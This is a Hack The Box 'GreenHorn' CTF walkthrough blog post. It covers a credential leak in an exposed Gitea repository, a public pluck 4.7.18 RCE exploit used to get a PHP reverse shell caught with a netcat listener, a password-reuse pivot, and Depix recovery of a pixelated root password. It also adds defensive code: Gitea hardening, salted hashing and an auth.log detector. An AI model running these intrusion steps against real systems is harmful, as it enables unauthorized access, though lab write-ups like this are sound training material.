Hackthebox: GreenHorn

Foued SAIDI

Overview

GreenHorn is an easy-difficulty machine from Hack The Box. It starts with an exposed Gitea instance on port 3000 that leaks a hashed password; the hash cracks easily, and the recovered credentials let us run a known Remote Code Execution exploit against pluck version 4.7.18 to land a shell. The same password is then reused to pivot to a second user and read the user flag. Finally, a somewhat CTF-style challenge: un-blurring a pixelated password inside a PDF file with Depix gives us the root flag. A bit fun and CTFy.

GreenHorn-info-card

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.243.215 --unprivileged
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-06 11:17 W. Central Africa Standard Time
Nmap scan report for 10.129.243.215
Host is up (0.47s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Golang net/http server
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=9f5aa4ec0c774f5b; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=aXOh4QdKFxkpyQqDtbwe-PZB9II6MTczMzQ4MDYyOTE5OTQzMjE4MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 06 Dec 2024 10:23:49 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=37743110979ab7c9; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=2mURmA5eek0cP98R8m5XcKO9Ryk6MTczMzQ4MDYzMDgwNjIxMTkwNg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 06 Dec 2024 10:23:50 GMT
|_ Content-Length: 0
|_http-title: GreenHorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<snip>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.94 seconds

Three ports are open: SSH on 22, HTTP on 80 (nginx, redirecting to greenhorn.htb, so we add that name to our /etc/hosts), and HTTP on 3000, which is a Gitea instance (the i_like_gitea cookie gives it away).

Web Application - http://greenhorn.htb:3000 - Gitea

Navigating to the Gitea portal, we can create an account normally, without any admin approval:

Gitea
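The fix on the defender's side is a one-line setting. The fragment below is an added example, not configuration from the box: Gitea's app.ini (by default custom/conf/app.ini) controls self-service sign-up with DISABLE_REGISTRATION in the [service] section, and REQUIRE_SIGNIN_VIEW decides whether unauthenticated visitors may browse repositories at all.

```ini
; Gitea app.ini, [service] section (added example; the box's real file is not shown)
[service]
; Weak: anyone who can reach port 3000 may register an account and read the repos
; DISABLE_REGISTRATION = false
; REQUIRE_SIGNIN_VIEW  = false

; Hardened: no self-service sign-up, and nothing is visible without logging in
DISABLE_REGISTRATION = true
REQUIRE_SIGNIN_VIEW  = true
```

Neither setting removes credentials that were already committed; a secret that has been pushed to a repository has to be rotated, not just hidden.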

We can then explore what this Gitea instance holds for us:

Gitea

We find a GreenHorn repository at http://greenhorn.htb:3000/GreenAdmin/GreenHorn that presumably holds the source code of the main web app on port 80. I could have started a proper source code review, but instead I relied on the web developer's inexperience (in the hacking sense, of course) and searched the repository for exposed credentials, and BOOM:

Gitea

We take the hash to CrackStation, without even having to launch my Kali VM, and get a hit:

Gitea

(Yeah, I love you too!)
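The instant CrackStation hit is worth understanding: an unsalted digest of a common password is a fixed value, so "cracking" it is a table lookup, not a computation. The script below is an added example for this writeup (not the box's code or pluck's): it builds a tiny constructed lookup table of common passwords, reverses an unsalted SHA-512 with one dictionary access, and contrasts that with salted PBKDF2, where each account's digest differs and no precomputed table applies. The candidate list and the fixed salts used in the demonstration are constructed values.

```python
"""Added example: why an unsalted hash falls to a lookup table, and what a
salted, slow KDF changes.  COMMON_PASSWORDS and the demo salts are constructed
for illustration; nothing here is data taken from the box."""
import hashlib
import hmac
import os

# Constructed stand-in for a CrackStation-style table: a handful of common
# passwords.  Real tables hold billions of (digest -> plaintext) pairs.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "iloveyou1", "letmein"]


def unsalted_digest(password, algo="sha512"):
    """How a naive application stores a password: one deterministic digest, no salt."""
    return hashlib.new(algo, password.encode()).hexdigest()


def build_lookup_table(passwords, algo="sha512"):
    """Precompute digest -> plaintext once; every later 'crack' is a dict lookup."""
    return {unsalted_digest(p, algo): p for p in passwords}


def lookup_unsalted(hex_digest, table):
    """Reversing an unsalted hash costs one lookup, not one hash computation."""
    return table.get(hex_digest.lower())


def hash_password_pbkdf2(password, salt=None, iterations=600_000):
    """Return (salt, derived_key) for storage.  A fresh random salt per user means
    the same password yields a different digest on every account, so a
    precomputed table is useless, and the iteration count makes each guess slow."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, dk


def verify_pbkdf2(password, salt, stored_dk, iterations=600_000):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, stored_dk)


if __name__ == "__main__":
    table = build_lookup_table(COMMON_PASSWORDS)
    print("unsalted sha512 ->", lookup_unsalted(unsalted_digest("iloveyou1"), table))
    salt, dk = hash_password_pbkdf2("iloveyou1")
    print("pbkdf2 in table? ->", lookup_unsalted(dk.hex(), table))
    print("pbkdf2 verifies  ->", verify_pbkdf2("iloveyou1", salt, dk))
```

The salt does not need to be secret; it only has to be unique per record so that the attacker must start from scratch for every hash instead of once for every hash ever collected.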

Now what are we gonna do with these creds?

Web Application - http://greenhorn.htb:80

Web Application

It looks like an ordinary front page for the website; however, the footer carries a "powered by pluck" message.
pluck is a CMS, just like WordPress.

A quick Google search for pluck exploits or CVEs turned up this pluck v4.7.18 RCE exploit, which only needs valid credentials to execute commands.
We supply it with the previously captured credentials, like this: login_payload = {"cont1": "iloveyou1", "bogus": "", "submit": "Log in"}, and also create a shell.php script to land a reverse shell (I simply used this PHP reverse shell script):

PS C:\Users\0xkujen> python3 .\exploit.py
Login account
ZIP file download.

And we get a shell!

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.243.215] 37750
Linux greenhorn 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
10:53:08 up 43 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Pivoting to junior - Password reuse

At first I wondered how to pivot; then I simply thought of reusing the same password again :)

www-data@greenhorn:/home$ su junior
su junior
Password: iloveyou1

junior@greenhorn:/home$ cd junior && cat user.txt
cd junior && cat user.txt
c89fc0240226ae******************
junior@greenhorn:~$

And we got our user flag!
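From the blue-team side, this pivot leaves a very distinctive trace: the web server's service account (www-data, uid 33) opening an su session into a human account. The detector below is an added example written for this writeup, not tooling from the box. It parses pam_unix su session lines in the Ubuntu auth.log format and flags any session opened by a system UID (1..999, below Ubuntu's default UID_MIN of 1000). The log lines are constructed samples modelled on this pivot, not captured from the machine.

```python
"""Added example: flag su sessions opened by service accounts in auth.log.
SAMPLE_AUTH_LOG is constructed in Ubuntu's pam_unix format; it is not a
capture from the box."""
import re

SAMPLE_AUTH_LOG = """\
Dec  6 10:40:12 greenhorn sshd[1201]: Accepted publickey for junior from 10.10.14.5 port 50122 ssh2
Dec  6 10:55:31 greenhorn su: (to junior) www-data on none
Dec  6 10:55:31 greenhorn su: pam_unix(su:session): session opened for user junior(uid=1000) by (uid=33)
Dec  6 10:57:02 greenhorn su: (to root) junior on pts/0
Dec  6 10:57:02 greenhorn su: pam_unix(su:session): session opened for user root(uid=0) by junior(uid=1000)
"""

# Ubuntu allocates human accounts from UID 1000 (UID_MIN in /etc/login.defs);
# 1..999 are system/service accounts such as www-data (33).  Root (0) is
# excluded: root switching to a user is routine administration.
UID_MIN = 1000

# "session opened for user junior(uid=1000) by (uid=33)"; newer pam builds also
# print the caller's name before its uid, so that part is optional.
SU_SESSION_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) su(?:\[\d+\])?: "
    r"pam_unix\(su(?:-l)?:session\): session opened for user "
    r"(?P<target>[\w.-]+)\(uid=(?P<target_uid>\d+)\) by (?:[\w.-]+)?\(uid=(?P<source_uid>\d+)\)"
)


def is_service_uid(uid):
    """True for system accounts that should never be typing passwords into su."""
    return 0 < uid < UID_MIN


def detect_su_from_service_accounts(log_text):
    """Return one finding per su session whose caller is a service account."""
    findings = []
    for line in log_text.splitlines():
        m = SU_SESSION_RE.match(line)
        if not m:
            continue
        source_uid = int(m["source_uid"])
        if is_service_uid(source_uid):
            findings.append({
                "timestamp": m["ts"],
                "host": m["host"],
                "source_uid": source_uid,
                "target": m["target"],
                "target_uid": int(m["target_uid"]),
                "reason": "su session opened by a service account (web-shell pivot pattern)",
            })
    return findings


if __name__ == "__main__":
    for f in detect_su_from_service_accounts(SAMPLE_AUTH_LOG):
        print(f)
```

The junior-to-root su a minute later is not flagged by this rule on its own; correlating it with the preceding service-account pivot is what turns two ordinary-looking lines into an incident.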

Privilege escalation to root - Depix exploit

In junior's home directory there was an odd PDF file:

junior@greenhorn:~$ ls
ls
user.txt 'Using OpenVAS.pdf'

Let's download it. One way is to generate a key pair with ssh-keygen, add the public key to junior's .ssh/authorized_keys file, and pull the file down with scp.
These were the contents of the file:

Blurry PDF

I instantly thought of Depix (I'm a CTF player and have encountered this challenge countless times). You can read more about Depix to understand how it actually works.
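To make the idea behind Depix concrete, here is a toy version of its approach, added for this writeup and not code from the Depix project: a tiny constructed 4x4 bitmap font, a box-average pixelation, and a lookup from pixelated block patterns back to the glyphs that produced them. Depix does the same thing on real images, matching blocks of the pixelated password against an identically pixelated "search image" of rendered text (the De Bruijn sequence screenshot used later in this writeup). The font, block size and sample strings here are all constructed.

```python
"""Added example: a toy of the Depix approach.  FONT, the glyph size and BLOCK
are constructed for illustration, not values from Depix or from the box."""

# 4x4 bitmap glyphs, "1" = ink.  "B" and "D" are deliberately similar so the
# demonstration shows an ambiguous match as well as exact ones.
FONT = {
    "A": ["0110", "1001", "1111", "1001"],
    "B": ["1110", "1001", "1110", "1001"],
    "C": ["0111", "1000", "1000", "0111"],
    "D": ["1110", "1001", "1001", "1110"],
    "E": ["1111", "1000", "1110", "1111"],
    " ": ["0000", "0000", "0000", "0000"],
}
GLYPH_W = GLYPH_H = 4
BLOCK = 2  # pixelation block size: each 4x4 glyph becomes a 2x2 grid of tiles


def render(text, font=FONT):
    """Render text as a 2-D list of 0/1 pixels, glyphs side by side."""
    rows = [[] for _ in range(GLYPH_H)]
    for ch in text:
        for r, bits in enumerate(font[ch]):
            rows[r].extend(int(b) for b in bits)
    return rows


def pixelate(img, block=BLOCK):
    """Box pixelation: replace each block x block tile by its total ink.
    A real filter stores the average colour; the ink count is the same
    information scaled by a constant, and keeps the arithmetic exact."""
    h, w = len(img), len(img[0])
    return [
        [sum(img[y][x] for y in range(by, by + block) for x in range(bx, bx + block))
         for bx in range(0, w, block)]
        for by in range(0, h, block)
    ]


def block_signature(pix, col_start, ncols):
    """Flatten the pixelated tiles covering one glyph into a hashable key."""
    return tuple(pix[r][c] for r in range(len(pix)) for c in range(col_start, col_start + ncols))


def build_search_table(font=FONT, block=BLOCK):
    """Depix's 'search image' step: render every glyph the way the victim did,
    pixelate it identically, and index the result by its tile pattern."""
    table = {}
    for ch in font:
        sig = block_signature(pixelate(render(ch, font), block), 0, GLYPH_W // block)
        table.setdefault(sig, []).append(ch)
    return table


def depixelate(pix, table, block=BLOCK):
    """For each glyph-sized column span, list the glyphs whose pixelation
    matches exactly.  One candidate = recovered; several = ambiguous."""
    ncols = GLYPH_W // block
    n_glyphs = len(pix[0]) // ncols
    return [table.get(block_signature(pix, i * ncols, ncols), []) for i in range(n_glyphs)]


def recover(text):
    """Pixelate a rendered secret, then match it against the search table."""
    return depixelate(pixelate(render(text)), build_search_table())


if __name__ == "__main__":
    print(recover("ACE"))  # every glyph recovered uniquely
    print(recover("BAD"))  # B and D collide at this block size: two candidates each
```

The lesson for anyone producing documents is that pixelation and blurring are deterministic functions of the rendered text: whoever can reproduce the font, size and renderer can often reproduce the mapping and invert it. Redaction means removing the text or covering it with an opaque block before the file is exported, never pixelating it.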
The only trick with Depix is choosing the right search image as the reference for de-pixelating the password; here we use this one:

PS C:\Users\0xkujen\Depix> python3 .\depix.py -p .\pass.png -s .\images\searchimages\debruinseq_notepad_Windows10_closeAndSpaced.png -o cleartext_password.png
2024-12-06 11:58:07,462 - Loading pixelated image from .\pass.png
2024-12-06 11:58:07,494 - Loading search image from .\images\searchimages\debruinseq_notepad_Windows10_closeAndSpaced.png
2024-12-06 11:58:08,428 - Finding color rectangles from pixelated space
2024-12-06 11:58:08,430 - Found 19 same color rectangles
2024-12-06 11:58:08,430 - 14 rectangles left after moot filter
2024-12-06 11:58:08,430 - Found 3 different rectangle sizes
2024-12-06 11:58:08,431 - Finding matches in search image
2024-12-06 11:58:08,431 - Scanning 12 blocks with size (1, 1)
2024-12-06 11:58:08,435 - Scanning in searchImage: 0/1678
2024-12-06 11:58:12,771 - Scanning 1 blocks with size (1, 3)
2024-12-06 11:58:12,774 - Scanning in searchImage: 0/1678
2024-12-06 11:58:15,767 - Scanning 1 blocks with size (14, 14)
2024-12-06 11:58:15,830 - Scanning in searchImage: 0/1665
2024-12-06 11:58:36,279 - Scanning in searchImage: 333/1665
2024-12-06 11:58:56,897 - Scanning in searchImage: 666/1665
2024-12-06 11:59:17,474 - Scanning in searchImage: 999/1665
2024-12-06 11:59:37,987 - Scanning in searchImage: 1332/1665
2024-12-06 11:59:58,540 - Removing blocks with no matches
2024-12-06 11:59:58,540 - Splitting single matches and multiple matches
2024-12-06 11:59:58,540 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,541 - Trying geometrical matches on single-match squares
2024-12-06 11:59:58,541 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,541 - Trying another pass on geometrical matches
2024-12-06 11:59:58,541 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,543 - Writing single match results to output
2024-12-06 11:59:58,543 - Writing average results for multiple matches to output
2024-12-06 11:59:58,543 - Saving output image to: cleartext_password.png
PS C:\Users\0xkujen\Depix>

And we get our password:

Cleartext password

root:sidefromsidetheothersidesidefromsidetheotherside

And rooted:

root@greenhorn:~# cat root.txt
a1095ad7c9b638******************
root@greenhorn:~#

That was it for GreenHorn, hope you learned something new.
-0xkujen

  • Title: Hackthebox: GreenHorn
  • Author: Foued SAIDI
  • Created at: 2024-12-06 11:04:05
  • Updated at: 2024-12-07 09:06:29
  • Link: https://kujen5.github.io/2024/12/06/Hackthebox-GreenHorn/
  • License: This work is licensed under CC BY-NC-SA 4.0.